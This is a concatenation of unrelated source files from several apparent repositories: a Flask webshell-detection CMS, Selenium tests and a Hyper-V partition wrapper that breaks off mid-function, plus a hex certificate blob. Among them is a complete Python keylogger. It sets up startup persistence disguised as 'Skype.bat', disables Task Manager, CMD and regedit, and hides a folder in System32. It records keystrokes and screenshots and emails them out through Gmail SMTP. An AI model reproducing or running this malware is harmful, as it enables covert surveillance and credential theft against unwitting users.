'a050004148b0b6f528a90a39758cd423dd0fd773be279d65ca08211d03082' \ '03ee30820357a00302010202107e93ebfb7cc64e59ea4b9a77d406fc3b300' \ 'd06092a864886f70d010105050030818b310b3009060355040613025a4131' \ '1530130603550408130c5765737465726e204361706531143012060355040' \ '7130b44757262616e76696c6c65310f300d060355040a1306546861777465' \ '311d301b060355040b13145468617774652043657274696669636174696f6' \ 'e311f301d060355040313165468617774652054696d657374616d70696e67' \ '204341301e170d3132313232313030303030305a170d32303132333032333' \ '53935395a305e310b3009060355040613025553311d301b060355040a1314' \ '53796d616e74656320436f72706f726174696f6e3130302e0603550403132' \ '753796d616e7465632054696d65205374616d70696e672053657276696365' \ '73204341202d20473230820122300d06092a864886f70d010101050003820' \ '10f003082010a0282010100b1acb349544b971c120ad825799122572a6fdc' \ 'b826c443736bc2bf2e505afb14c2768e43012543b4a1e245f4e8b77bc374c' \ '<KEY>' \ '2bcb991eac721b264d711fb131ddfb51610253a6aaf5492c057845a52f89c' \ '<KEY>' \ '<KEY>' \ 'af7fb747c27e6f74a1b7fa7c39e2dae8aeaa6e6aa27167d61f7987111bce2' \ '50a14be55dfae50ea72c9faa6520d3d896e8c87ca54e4844ff19e24407920' \ 'bd76884805d6a786445cd60467e54c1137cc579f1c9c1710203010001a381' \ 'fa3081f7301d0603551d0e041604145f9af56e5ccccc749ad4dd7def3fdbe' \ 'c4c802edd303206082b0601050507010104263024302206082b0601050507' \ '30018616687474703a2f2f6f6373702e7468617774652e636f6d301206035' \ '51d130101ff040830060101ff020100303f0603551d1f043830363034a032' \ 'a030862e687474703a2f2f63726c2e7468617774652e636f6d2f546861777' \ '46554696d657374616d70696e6743412e63726c30130603551d25040c300a' \ '06082b06010505070308300e0603551d0f0101ff040403020106302806035' \ '51d110421301fa41d301b311930170603550403131054696d655374616d70' \ '2d323034382d31300d06092a864886f70d01010505000381810003099b8f7' \ '9ef7f5930aaef68b5fae3091dbb4f82065d375fa6529f168dea1c9209446e' \ 'f56deb587c30e8f9698d23730b126f47a9ae3911f82ab19bb01ac38eeb599' \ '600adce0c4db2d031a6085c2a7afce27a1d574ca86518e979406225966ec7' \ 'c7376a8321088e41eaddd9573f1d7749872a16065ea6386a2212a35119837' \ 'eb63082042830820310a003020102020b0400000000012f4ee1355c300d06' \ '092a864886f70d01010505003057310b30090603550406130242453119301' \ '7060355040a1310476c6f62616c5369676e206e762d73613110300e060355' \ '040b1307526f6f74204341311b301906035504031312476c6f62616c53696' \ '76e20526f6f74204341301e170d3131303431333130303030305a170d3139' \ '303431333130303030305a3051310b3009060355040613024245311930170' \ '60355040a1310476c6f62616c5369676e206e762d73613127302506035504' \ '03131e476c6f62616c5369676e20436f64655369676e696e67204341202d2' \ '0473230820122300d06092a864886f70d01010105000382010f003082010a' \ '0282010100b24f14e710bed72672ab3697ef53bf42845e58d18a28fc43466' \ 'f7e2844500b755d00d73c0a449e206aa4f7454a3760a36e3f12fa6dfab646' \ '<KEY>' \ 'a243149d5a2a9e2d391ab3e3c73eff629f1c835d0307b7f4e92a5068f87e2' \ 'cef5c16366ac18692ac15ebb5ae86e95ff3b80629d99c7c72f66d5fd621a8' \ '<KEY>' \ 'a974e3a50854d983353b8e8c230c75b6de864a9e1a3e0a5049389cd2a890b' \ 'f98fac88c2b27117e2afbcedea9ae389322faa6ecfb5c6176c344d6cc0c7e' \ '2f6d0680a27440bbb71ff43bd773541ff30203010001a381fa3081f7300e0' \ '603551d0f0101ff04040302010630120603551d130101ff040830060101ff' \ '020100301d0603551d0e04160414086ed8b69c8abfed3ed7c3745dcc801fa' \ '82f507a30470603551d200440303e303c0604551d20003034303206082b06' \ '010505070201162668747470733a2f2f7777772e676c6f62616c7369676e2' \ 'e636f6d2f7265706f7369746f72792f30330603551d1f042c302a3028a026' \ 'a0248622687474703a2f2f63726c2e676c6f62616c7369676e2e6e65742f7' \ '26f6f742e63726c30130603551d25040c300a06082b06010505070303301f' \ '0603551d23041830168014607b661a450d97ca89502f7d04cd34a8fffcfd4' \ '<KEY>' \ '<KEY>' \ '226bb3b6c97e7c7ce116d6891da8d6df1534d54388c61f3c8827669be8132' \ '0b31c36cc99e200a582ff048fe7e4807aad743589473540431a9780d3b8cb' \ '070c13d7ed7bd2f2ac3e2f58f0c90dc6ba5c8be685e5d6df878d2be49951e' \ '15780891fb34c8be84adbce0c6dd18dbf3caf07bc2143c18b803ba953e211' \ 'e3f60697a7f6a039e8d4af9f0282c30845eec267242b16dcb64c3128cd684' \ '4b67417cb103177809e3ada8b6962da47e80034f88f7c16b5a4615cd2c198' \ 'bd8709ce52d49886072a8a4195270435edad64603b0680e24ef4af60b2524' \ 'ef24308204a33082038ba00302010202100ecff438c8febf356e04d86a981' \ 'b1a50300d06092a864886f70d0101050500305e310b300906035504061302' \ '5553311d301b060355040a131453796d616e74656320436f72706f7261746' \ '96f6e3130302e0603550403132753796d616e7465632054696d6520537461' \ '6d70696e67205365727669636573204341202d204732301e170d313231303' \ '1383030303030305a170d3230313232393233353935395a3062310b300906' \ '0355040613025553311d301b060355040a131453796d616e74656320436f7' \ '2706f726174696f6e313430320603550403132b53796d616e746563205469' \ '6d65205374616d70696e67205365727669636573205369676e6572202d204' \ '73430820122300d06092a864886f70d01010105000382010f003082010a02' \ '82010100a2630b3944b8bb23a74449bb0effa1f0610a5393b098dbad2c0f4' \ 'ac56eff863c53550f15ce043f2bfda99696d9be61790b5bc94c8676e5e043' \ '4b2295eec22b43c19fd868b48e404fee8538b911c523f26458f015326f4e5' \ '7a1ae88a402d72a1ecd4be1dd63d51789325bb05e995aa89d28500e17ee96' \ '<KEY>' \ '3649419bd2580e1e8d222a5d0ba027aa177935b65c3ee1774bc41862adc08' \ '<KEY>' \ '5c5ea330bd2f1a31bf48bbed9b3578b3bde04a77a22b224ae2ec770c5be4e' \ '832608fb0bbda94f9908e1102872aacd0203010001a382015730820153300' \ 'c0603551d130101ff0402300030160603551d250101ff040c300a06082b06' \ '010505070308300e0603551d0f0101ff040403020780307306082b0601050' \ '507010104673065302a06082b06010505073001861e687474703a2f2f7473' \ '2d6f6373702e77732e73796d616e7465632e636f6d303706082b060105050' \ '73002862b687474703a2f2f74732d6169612e77732e73796d616e7465632e' \ '636f6d2f7473732d63612d67322e636572303c0603551d1f043530333031a' \ '02fa02d862b687474703a2f2f74732d63726c2e77732e73796d616e746563' \ '2e636f6d2f7473732d63612d67322e63726c30280603551d110421301fa41' \ 'd301b311930170603550403131054696d655374616d702d323034382d3230' \ '1d0603551d0e0416041446c669a30e4a141ed54cda5263173f5e36bc0de63' \ '01f0603551d230418301680145f9af56e5ccccc749ad4dd7def3fdbec4c80' \ '2edd300d06092a864886f70d01010505000382010100783bb4912a004cf08' \ 'f62303778a38427076f18b2de25dca0d49403aa864e259f9a40031cddcee3' \ '79cb216806dab632b46dbff42c266333e449646d0de6c3670ef705a4356c7' \ '<KEY>' \ '0420a3aaf14bc48829910e80d111fcdd5c766e4f5e0e4546416e0db0ea389' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ '<KEY>' \ 'cd8047530820507308203efa0030201020212112133b1a3a74c3748dc9fcf' \ '7c6e580afdaf300d06092a864886f70d01010505003051310b30090603550' \ '4061302424531193017060355040a1310476c6f62616c5369676e206e762d' \ '7361312730250603550403131e476c6f62616c5369676e20436f646553696' \ '76e696e67204341202d204732301e170d3133313030383231343233385a17' \ '0d3136303630353134303130365a30819c310b30090603550406130255533' \ '10b3009060355040813024b53310f300d060355040713064f6c6174686531' \ '183016060355040a130f506f7765722041646d696e204c4c4331143012060' \ '355040b130b446576656c6f706d656e74311830160603550403130f506f77' \ '65722041646d696e204c4c433125302306092a864886f70d0109011616737' \ '570706f727440706f77657261646d696e2e636f6d30820122300d06092a86' \ '4886f70d01010105000382010f003082010a0282010100efa9e972a69924f' \ '<KEY>' \ 'ffc255a460c28f82594ecc7eebf305006815153b45ca6b26ae2f101ac5e95' \ '<KEY>' \ '<KEY>' \ '822ff973026f1f1ecee59aac179fedd0c4afedf8b2735d4ef9ccc0e3feb3f' \ '42af401762f9d5d0ce8e7478f05ef8c919e5fc7bfce0636762317f8bb3bb7' \ '23dd0f861be11e25df981fb5279a6f67bc296179856cbbd2d88ce0176367f' \ 'da73242c8c56b04dc47ef4c7673e61453780560e92a28e620a12c92c98ca5' \ 'e806fd4750203010001a382018b30820187300e0603551d0f0101ff040403' \ '020780304c0603551d2004453043304106092b06010401a03201323034303' \ '206082b06010505070201162668747470733a2f2f7777772e676c6f62616c' \ '7369676e2e636f6d2f7265706f7369746f72792f30090603551d130402300' \ '030130603551d25040c300a06082b06010505070303303e0603551d1f0437' \ '30353033a031a02f862d687474703a2f2f63726c2e676c6f62616c7369676' \ 'e2e636f6d2f67732f6773636f64657369676e67322e63726c30818606082b' \ '06010505070101047a3078304006082b060105050730028634687474703a2' \ 'f2f7365637572652e676c6f62616c7369676e2e636f6d2f6361636572742f' \ '6773636f64657369676e67322e637274303406082b0601050507300186286' \ '87474703a2f2f6f637370322e676c6f62616c7369676e2e636f6d2f677363' \ '6f64657369676e6732301d0603551d0e04160414f7480f1f0943f61895a95' \ '7e787de87c0555213a1301f0603551d23041830168014086ed8b69c8abfed' \ '3ed7c3745dcc801fa82f507a300d06092a864886f70d01010505000382010' \ '10020ed7f5d04185d39a6b50511f385ba3554a8c6f164517f2a67563c4735' \ '5d9613ffeb04ebaf33af38992c9b16502e9608bc1846a6deb4e215b140917' \ '112ae8f4902e64d852021fa653a0b4efce6458a69f2f9e1623c676a357828' \ '02ae7511bd6d51b6313ebe51af927cfac4aafc8f5a716d6a35e1cfab40557' \ '361903be1f6e420b3b4666b55bef26becc7f4c7175a17a772f9d88da4a7e9' \ '<KEY>' \ 'cb226db9c99d018ec4de96552fef49eee7eea72068e98ba87bce4c4a365d0' \ '8db98003055d9f31d50ca4f87c1e83d1538d04d9de353086974bff96ade54' \ '101d6601b3b34905411003787e73182045e3082045a02010130673051310b' \ '300906035504061302424531193017060355040a1310476c6f62616c53696' \ '76e206e762d7361312730250603550403131e476c6f62616c5369676e2043' \ '6f64655369676e696e67204341202d2047320212112133b1a3a74c3748dc9' \ 'fcf7c6e580afdaf300906052b0e03021a0500a081be301906092a864886f7' \ '0d010903310c060a2b060104018237020104301c060a2b060104018237020' \ '10b310e300c060a2b060104018237020115302306092a864886f70d010904' \ '3116041489bb82567db1fb85096cbd3c3c8db926a6f53cad305e060a2b060' \ '10401823702010c3150304ea02e802c0050006f0077006500720020004100' \ '64006d0069006e0020004c004c00430020005000410045007800650063a11' \ 'c801a687474703a2f2f7777772e706f77657261646d696e2e636f6d20300d' \ '06092a864886f70d0101010500048201007f89049751a555829048d7409c7' \ 'e03561dbc24a42c6846fb21d8688e7626ce1901e8cc8cf2b6367c6a420828' \ '<KEY>' \ '256b8b501387a02b777960feaef5262a85c120e472af35b93f2aeda47326f' \ 'bb177b26bcc3a38f7c347c07576ef9a21131ae477cf3fc42f92d558309fdc' \ '8c560171473591b7db0a4c83db7d26ea7746cfed79bf720ba1d6bd2ce1793' \ 'aded267d8c665abe834bfa9b17dc326e005cb3ed68d17eb70351025d45567' \ 'd2c90ad1005572efce374ddf01d898672d71f941036c4af9c74475a5b1ce8' \ 'ce529b0eb46dda41e93a9a8afe53148c065be8955efda466527eb3bddca18' \ '2020b3082020706092a864886f70d010906318201f8308201f40201013072' \ '305e310b3009060355040613025553311d301b060355040a131453796d616' \ 'e74656320436f72706f726174696f6e3130302e0603550403132753796d61' \ '6e7465632054696d65205374616d70696e672053657276696365732043412' \ '02d20473202100ecff438c8febf356e04d86a981b1a50300906052b0e0302' \ '1a0500a05d301806092a864886f70d010903310b06092a864886f70d01070' \ '1301c06092a864886f70d010905310f170d3135303232353134333532325a' \ '302306092a864886f70d010904311604145455430ff01d5ea632e1e24ce7f' \ '<KEY>' \ '<KEY>' \ 'bfdec99c62caef297e9665a0f5d4c398ebbeee14948298bee9372de956237' \ '6263c3b31e0173d428e91c307276dd57a30e5e13c9c49d7b6335a38a4c02d' \ '4d1cd9b18019e2d8bb08fa6b54882aa4b2e4040ed74e23feef64c8e9b843c' \ 'af2f0fea60fdf2180604b8d51ddd50934e90766ffd0a7b9b1584e28c2bea8' \ '<KEY>' \ '<KEY>' \ 'cce617fbf36732899810434ae54185141ce5495bff74e45baef3832cc5b1a' \ 'fe0c65ad3200440000000000' ```
{ "source": "0v3rW4tch/webshell_detect_cms", "score": 2 }
#### File: webshell_detect_cms/apps/hooks.py ```python from .views import bp import config from flask import session,g from .models import CMSUser @bp.before_request def before_request(): if 'user_id' in session: user_id = session.get('user_id') user = CMSUser.query.get(user_id) if user: g.cms_user = user ``` #### File: 0v3rW4tch/webshell_detect_cms/cms_develop.py ```python from flask import Flask from apps import bp_app import config from exts import db,scheduler from flask_wtf import CSRFProtect from utils import detectcore def create_app(): app = Flask(__name__) app.register_blueprint(bp_app) app.config.from_object(config) db.init_app(app) app.config.update( {"SCHEDULER_API_ENABLED": True, "JOBS": [{"id": "mission_1", "func": "utils.detectcore:train_save_model", "trigger": "interval", "seconds": 3600*24 },{"id": "mission_2", # 任务ID "func": "apps.views:del_upload_file", # 任务位置 "trigger": "interval", # 触发器 "seconds": 3600*11 # 时间间隔 },{"id": "mission_3", # 任务ID "func": "utils.detectcore:do_cross_validate", # 任务位置 "trigger": "interval", # 触发器 "seconds": 3600*12 # 时间间隔 } ]},threaded=True ) scheduler.init_app(app) scheduler.start() CSRFProtect(app) return app app = create_app() if __name__ == '__main__': app.run(host='0.0.0.0',threaded=True,port=8888) ``` #### File: 0v3rW4tch/webshell_detect_cms/manage.py ```python from flask_script import Manager from flask_migrate import Migrate,MigrateCommand from cms_develop import create_app from exts import db from apps.models import CMSUser app = create_app() manager = Manager(app) Migrate(app,db) manager.add_command('db',MigrateCommand) @manager.option('-u','--username',dest='username') @manager.option('-p','--password',dest = 'password') @manager.option('-e','--email',dest = 'email') def create_cms_user(username,password,email): user = CMSUser(username,password,email) db.session.add(user) db.session.commit() print("用户增加成功") if __name__ == '__main__': manager.run() ```
{ "source": "0ver3inker/Python-Keylogger", "score": 2 }
#### File: 0ver3inker/Python-Keylogger/Keylogger.py ```python import sys import os from os.path import expanduser # -------------------------------------------------------- # FOR THE CHECKUPS AND USING WINDOWS COMMANDS ON SHELL from platform import system import ctypes import getpass # -------------------------------------------------------- # GETTING THE PROCESS TIME # import datetime import time from time import sleep as s # --------------------------------------------------------- # GETTING USER'S IPV6 ADDRESS import urllib.request # ---------------------------------------------------------- # SENDING AN EMAIL import smtplib from email.mime.text import MIMEText from email.mime.multipart import MIMEMultipart import smtplib import mimetypes import email.mime.application from email.mime.base import MIMEBase from email import encoders from email.mime.image import MIMEImage # --------------------------------------------------------- # KEYLOGGER LIBRARIES import pynput from pynput.keyboard import Key, Listener import logging # -------------------------------------------------------------- # THREADING import threading from threading import Thread # -------------------------------------------------------------- # BACKDOOR LIBRARIES, CLIENT import socket import subprocess # -------------------------------------------------------------- # TAKING SCREENSHOTS import pyautogui """------------------------------------------------------- CHECKS -----------------------------------------------------------------""" # ADD TO STARTUP USER_NAME = getpass.getuser() def AddToRegistry(file_path=""): if file_path == "": file_path = os.path.dirname(os.path.realpath(__file__)) bat_path = ( r"C:\\Users\\%s\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\Programs\\Startup" % USER_NAME ) with open(bat_path + "\\" + "Skype.bat", "w+") as bat_file: bat_file.write(r'start "" %s' % file_path) # --------------------- class disablecheck: # DISABLE TASK MANAGER def task(self): os.system( "REG add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f" ) # DISABLE CMD def cmd(self): os.system( "REG add HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System /v DisableCMD /t REG_DWORD /d 1 /f" ) # DISABLE REGEDIT def regedit(self): os.system( 'REG add "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System" /t Reg_dword /v DisableRegistryTools /f /d 0' ) # DISABLE GROUP POLICY def grouppolicy(self): os.system( 'REG add "HKCU\Software\Policies\Microsoft\MMC{8FC0B734-A0E1-11D1-A7D3-0000F87571E3}" /v Restrict_Run /t REG_DWORD /d 1 /f' ) """------------------------------------------------------- EXPLOITS -----------------------------------------------------------------""" general_path = expanduser("~") # TAKE SCREENSHOTS def takescreenshot(screenshotpath): screenshot_index = 0 while 1: myScreenshot = pyautogui.screenshot() myScreenshot.save(f"{screenshotpath}/{screenshot_index}.png") screenshot_index += 1 s(5) # -------------------- # GET IPV6 ADDRESS def getip(): external_ip = urllib.request.urlopen("https://ident.me").read().decode("utf8") return external_ip # -------------------- # KEYLOGGER class keylogger(Thread): def __init__(self, path): self.path = path self.keylog_index = 1 self.Keys = [] def on_press(self, key): self.KEY = pynput.keyboard.Key # --> Getting keys if key == self.KEY.backspace: self.Keys.append(" [Back] ") elif key == self.KEY.tab: self.Keys.append(" [Tab] ") elif key == self.KEY.enter: self.Keys.append(" [Enter] ") elif key == self.KEY.space: self.Keys.append(" [Space] ") elif ( type(key) == self.KEY ): # if the character is some other type of special key #--> Checking keys here self.Keys.append(" [" + str(key)[4:] + "] ") else: self.Keys.append(key) def savefile(): file_location = self.path + f"/keylog{self.keylog_index}.txt" with open(file_location, "w", encoding="utf-8") as f: # --> Saving Keys for i in self.Keys: f.write(str(i)) # DETERMINE WHEN YOU WANT THE KEYS TO SAVE TO A FILE if len(self.Keys) >= 20: savefile() self.keylog_index += 1 self.Keys.clear() def logger(self): file_location = self.path + f"/keylog{self.keylog_index}.txt" logging.basicConfig( filename=(file_location), level=logging.DEBUG, format="%(message)s") with Listener(on_press=self.on_press) as listener: listener.join() with open(file_location, "w", encoding="utf-8") as f: for i in self.Keys: f.write(str(i)) def run(self): self.t1 = threading.Thread(target=self.logger, args=()) self.t1.start() # -------------------- # SENDING AN EMAIL class Email: get_ip = getip() def __init__(self, path): self.email = "" self.password = "" self.path = path self.msg = MIMEMultipart() self.subject = self.msg["Subject"] = self.get_ip self.msg["From"] = "" self.msg["To"] = "" self.body = "" def addattachment(self): for files in os.listdir(self.path): if files.lower().endswith("txt"): self.msg.attach(MIMEText(self.body, "plain", "utf-8")) filename = files attachment = open(f"{self.path}\\{files}", "rb") p = MIMEBase("application", "octet-stream") p.set_payload((attachment).read()) encoders.encode_base64(p) p.add_header( "Content-Disposition", "attachment; filename= %s" % filename ) self.msg.attach(p) attachment.close() elif (files.lower().endswith("png")): fp = open(f"{self.path}\\{files}", 'rb') img = MIMEImage(fp.read(), _subtype="png") fp.close() img.add_header("Content-ID", "attachment; filename= %s" % files) self.msg.attach(img) else: print("Cannot find the extension!") def send(self): s = smtplib.SMTP("smtp.gmail.com", 587) s.starttls() s.login(self.email, self.password) s.sendmail(self.email, self.email, self.msg.as_string()) s.quit() def run(self): t1 = threading.Thread(target=self.addattachment) t2 = threading.Thread(target=self.send) t1.start() t1.join() t2.start() """------------------------------------------------------- RUNNING -----------------------------------------------------------------""" # GET THE SYSTEM NAME def getsystem(): return system() # MAKE IT INFALLIABLE if getsystem().lower() == "windows": # DIRECTORIES desktop_path = os.path.join(os.path.join(os.environ['USERPROFILE']), 'Desktop') system32_path = os.path.join(os.path.join(str(os.path.expanduser("~"))[0:3], "Windows\\System32")) try: exploit_path = os.mkdir(os.path.join(str(system32_path), "\\VHVybkJhY2tOb3c=")) except: pass exploit_path = expanduser(system32_path + "\\VHVybkJhY2tOb3c=") ctypes.windll.kernel32.SetFileAttributesW(exploit_path, 2) # HIDING OUR DIRECTORY # ADDING TO STARTUP AddToRegistry() # DISABLING REGEDIT, TASK MANAGER, GROUP POLICY AND CMD disable = disablecheck() disable.cmd() disable.grouppolicy() disable.regedit() disable.task() logger = keylogger(exploit_path) # KEYLOGGER OBJECT mail = Email(exploit_path) # EMAIL OBJECT logger.run() threading.Thread(target=takescreenshot, args=(exploit_path,)).start() def sendemail(): while True: check = os.listdir(exploit_path) count = 0 for keylogs in check: if keylogs.startswith("keylog"): count += 1 else: continue if count >= 5: mail.run() for check in os.listdir(exploit_path): try: os.remove(f"{exploit_path}\\{check}") s(0.1) except: continue else: continue s(5) threading.Thread(target = sendemail).start() ```
{ "source": "0verchenko/learning", "score": 3 }
#### File: 0verchenko/learning/test_items.py ```python from selenium.webdriver.common.by import By from selenium.webdriver.support.ui import WebDriverWait from selenium.webdriver.support import expected_conditions as EC LINK = "http://selenium1py.pythonanywhere.com/catalogue/coders-at-work_207/" def test_add_to_cart_button_is_displayed(browser): browser.get(LINK) add_to_cart_button = WebDriverWait(browser, 5).until( EC.visibility_of_element_located((By.CSS_SELECTOR, 'form#add_to_basket_form>button'))) assert add_to_cart_button.is_displayed() ```
{ "source": "0verchenko/PageObject", "score": 3 }
#### File: PageObject/pages/login_page.py ```python from .base_page import BasePage from .locators import LoginPageLocators class LoginPage(BasePage): def should_be_login_page(self): self.should_be_login_url() self.should_be_login_form() self.should_be_register_form() def should_be_login_url(self): assert "login" in self.browser.current_url def should_be_login_form(self): login_form = self.browser.find_element(*LoginPageLocators.LOGIN_FORM) assert login_form.is_displayed() def should_be_register_form(self): register_form = self.browser.find_element(*LoginPageLocators.REGISTER_FORM) assert register_form.is_displayed() ```
{ "source": "0vercl0k/pywinhv", "score": 3 }
#### File: pywinhv/pywinhv/partition.py ```python import winhvplatform as hvplat import pywinhv as whv import vp import utils import ctypes as ct import sys from ctypes.wintypes import BOOL, LPVOID, DWORD, c_size_t as SIZE_T from collections import namedtuple ct.windll.kernel32.VirtualAlloc.argtypes = (LPVOID, SIZE_T, DWORD, DWORD) ct.windll.kernel32.VirtualAlloc.restype = LPVOID VirtualAlloc = ct.windll.kernel32.VirtualAlloc ct.windll.kernel32.VirtualFree.argtypes = (LPVOID, SIZE_T, DWORD) ct.windll.kernel32.VirtualFree.restype = BOOL VirtualFree = ct.windll.kernel32.VirtualFree MEM_COMMIT = 0x00001000 MEM_RESERVE = 0x00002000 PAGE_READWRITE = 0x04 TranslationTableEntry_t = namedtuple( 'TranslationTableEntry_t', ( 'Gva', 'Hva', 'Flags' ) ) class WHvPartition(object): '''This is the Python abstraction for a Partition. The class can also be used a context manager. In this class, a lot of efforts are taken to hide a bunch of the WinHvPlatform APIs underlying details. On top of that, it makes invoking the raw APIs (exposed by SWIG) more pythonic. As there are a bunch of different addresses, I have tried to follow the following convention: * Partition object represent a 'guest', * The process from which you are instantiating the Partition is the 'host', * As a result - there are always three different addresses describing the same piece of memory: * The address in the host virtual address-space is an HVA, * The address in the guest virtual address-space is a GVA, * The address in the guest physical address-space is a GPA. ''' def __init__(self, **kwargs): '''Create and setup a Partition object.''' assert utils.IsHypervisorPresent(), 'The hypervisor platform APIs support must be turned on.' self.ProcessorCount = kwargs.get('ProcessorCount', 1) self.Name = kwargs.get('Name', 'DefaultName') self.ExceptionExitBitmap = kwargs.get('ExceptionExitBitmap', 0) # XXX: OrderedDict might be better? self.TranslationTable = {} self.Processors = [] # Create the partition. Success, Handle, Ret = hvplat.WHvCreatePartition() assert Success, 'WHvCreatePartition failed in context manager with %x.' % Ret self.Handle = Handle # Set-up the partition with a number of VPs. Property = whv.WHV_PARTITION_PROPERTY() Property.ProcessorCount = self.ProcessorCount Success, Ret = hvplat.WHvSetPartitionProperty( self.Handle, whv.WHvPartitionPropertyCodeProcessorCount, Property ) assert Success, 'WHvSetPartitionProperty(ProcessorCount) failed in context manager with %x.' % Ret # Set-up Exception exits. Property.ExtendedVmExits.ExceptionExit = 1 Success, Ret = hvplat.WHvSetPartitionProperty( self.Handle, whv.WHvPartitionPropertyCodeExtendedVmExits, Property ) assert Success, 'WHvSetPartitionProperty(ExtendedVmExits) failed in context manager with %x.' % Ret # Set-up the ExceptionExitBitmap. Property.ExceptionExitBitmap = 1 << whv.WHvX64ExceptionTypeBreakpointTrap Property.ExceptionExitBitmap |= 1 << whv.WHvX64ExceptionTypePageFault Property.ExceptionExitBitmap |= 1 << whv.WHvX64ExceptionTypeGeneralProtectionFault Success, Ret = hvplat.WHvSetPartitionProperty( self.Handle, whv.WHvPartitionPropertyCodeExceptionExitBitmap, Property ) assert Success, 'WHvSetPartitionProperty(ExceptionExitBitmap) failed in context manager with %x.' % Ret # Activate the partition. Success, Ret = hvplat.WHvSetupPartition(self.Handle) assert Success, 'WHvSetupPartition failed in context manager with %x.' % Ret # Create the virtual processors. for VpIndex in range(self.ProcessorCount): Success, Ret = hvplat.WHvCreateVirtualProcessor( self.Handle, VpIndex ) assert Success, 'WHvCreateVirtualProcessor(%d) failed in context manager with %x.' % (VpIndex, Ret) Vp = vp.WHvVirtualProcessor( self.Handle, self, VpIndex ) self.Processors.append(Vp) @classmethod def CreateDefault(cls, Name = 'default'): '''Create a default partition with a single VP.''' Partition = cls( ProcessorCount = 1, Name = Name, ) return Partition def __enter__(self): return self def __exit__(self, etype, value, traceback): BlockHasThrown = etype is not None # Release the VPs. for Vp in self.Processors: Success, Ret = hvplat.WHvDeleteVirtualProcessor( self.Handle, Vp.Index ) assert Success, 'WHvDeleteVirtualProcessor failed in context manager with %x.' % Ret # Release the Partition. Success, Ret = hvplat.WHvDeletePartition(self.Handle) assert Success, 'WHvDeletePartition failed in context manager with %x.' % Ret # XXX: Release memory self.TranslationTable = {} # Forward the exception is we've intercepted one, otherwise s'all good. return not BlockHasThrown def __repr__(self): '''Pretty-pinter for the Partition object.''' return 'Partition(%r, ProcessorCount=%d)' % ( self.Name, self.ProcessorCount ) def GetVp(self, Index): '''Get a VP instance.''' assert Index < self.ProcessorCount return self.Processors[Index] def MapGpaRangeWithoutContent(self, Gpa, SizeInBytes, Flags): '''Map a GPA range in the partition. This takes care of allocating memory in the host and mapping it in the guest.''' SizeInBytes = utils.Align2Page(SizeInBytes) Hva = VirtualAlloc( 0, SizeInBytes, MEM_RESERVE | MEM_COMMIT, PAGE_READWRITE ) assert Hva is not None, 'VirtualAlloc failed.' if 'd' not in Flags: # Force the 'd' dirty flag that is used for save/restore. Flags += 'd' WHvFlags = whv.WHvMapGpaRangeFlagNone if 'r' in Flags: WHvFlags |= whv.WHvMapGpaRangeFlagRead if 'w' in Flags: WHvFlags |= whv.WHvMapGpaRangeFlagWrite if 'x' in Flags: WHvFlags |= whv.WHvMapGpaRangeFlagExecute if 'd' in Flags: WHvFlags |= whv.WHvMapGpaRangeFlagTrackDirtyPages Success, Ret = hvplat.WHvMapGpaRange( self.Handle, Hva, Gpa, SizeInBytes, WHvFlags ) assert Success, 'WHvMapGpaRange failed with: %s.' % hvplat.WHvReturn(Ret) # Break the range into a series of pages for the translation table. for Idx in range(SizeInBytes / 0x1000): CurGpa = Gpa + (Idx * 0x1000) CurHva = Hva + (Idx * 0x1000) self.TranslationTable[CurGpa] = TranslationTableEntry_t( CurGpa, CurHva, Flags ) return (Hva, Gpa, SizeInBytes) def MapGpaRange(self, Gpa, Buffer, Flags): '''Map a GPA range in the partition and initialize it with content.''' Hva, _, SizeInBytes = self.MapGpaRangeWithoutContent( Gpa, len(Buffer), Flags ) ct.memmove(Hva, Buffer, len(Buffer)) return (Hva, SizeInBytes) def MapCode(self, Code, Gpa, Writeable = False): '''Map a GPA range used to host code in the partition.''' Flags = 'rx' if Writeable: Flags += 'w' Hva, CodeLength = self.MapGpaRange( Gpa, Code, Flags ) return (Hva, CodeLength) def UnmapGpaRange(self, Gpa, SizeInBytes, Hva = None): '''Unmap a GPA range and release the backing host memory page if provided.''' hvplat.WHvUnmapGpaRange( self.Handle, Gpa, SizeInBytes ) if Hva is None: return Success = VirtualFree( Hva, SizeInBytes, 0 ) == 0 assert Success, 'VirtualFree failed.' def TranslateGpa(self, Gpa): '''Translate a GPA to an HVA. This is only possible because we keep track of every call made to map GPA ranges and store the HVA/GPA.''' GpaAligned, Offset = utils.SplitAddress(Gpa) Entry = self.TranslationTable.get(GpaAligned, None) if Entry is not None: return Entry.Hva + Offset return None def GetPartitionCounters(self, Counter): '''Get a partition performance counter.''' Success, Counters, Ret = hvplat.WHvGetPartitionCounters( self.Handle, Counter ) assert Success, 'WHvGetPartitionCounters failed with: %s.' % hvplat.WHvReturn(Ret) return Counters def QueryGpaRangeDirtyBitmap(self, Gpa, RangeSize): '''Get a list of bits describing which physical guest page is dirty. One bit per page.''' Success, Bits, Ret = hvplat.WHvQueryGpaRangeDirtyBitmap( self.Handle, Gpa, RangeSize ) assert Success, 'WHvQueryGpaRangeDirtyBitmap failed with: %s.' % hvplat.WHvReturn(Ret) return Bits def ClearGpaRangeDirtyPages(self, Gpa, RangeSize): '''Clear the dirty bits on a GPA range.''' Success, _, Ret = hvplat.WHvQueryGpaRangeDirtyBitmap( self.Handle, Gpa, RangeSize, True ) assert Success, 'WHvQueryGpaRangeDirtyBitmap failed with: %s.' % hvplat.WHvReturn(Ret) def ClearGpaDirtyPage(self, Gpa): '''Clear the dirty bit for a specific GPA page.''' return self.ClearGpaRangeDirtyPages( Gpa, 0x1000 ) def QueryGpaRangeDirtyPages(self, Gpa, RangeSize): '''Get a list of the dirty GPAs.''' Bits = self.QueryGpaRangeDirtyBitmap( Gpa, RangeSize ) DirtyPages = [] CurGpa = Gpa for Bit in Bits: if Bit: DirtyPages.append(CurGpa) CurGpa += 0x1000 return DirtyPages def IsGpaDirty(self, Gpa): '''Is the GPA page dirty or not?''' return self.QueryGpaRangeDirtyBitmap( Gpa, 0x1000 )[0] def Save(self): '''Save a snapshot of the virtual processors registers as well as the physical memory space. It can be restored with Restore.''' Snapshot = { 'VP' : [], 'Mem' : {}, 'Table' : self.GetTranslationTable() } # XXX: SpecCtrl & cie, ensure they are available in the VP. for Vp in self.Processors: Registers = Vp.GetRegisters(hvplat.AllRegisters) Snapshot['VP'].append(( Vp.Index, Registers )) for 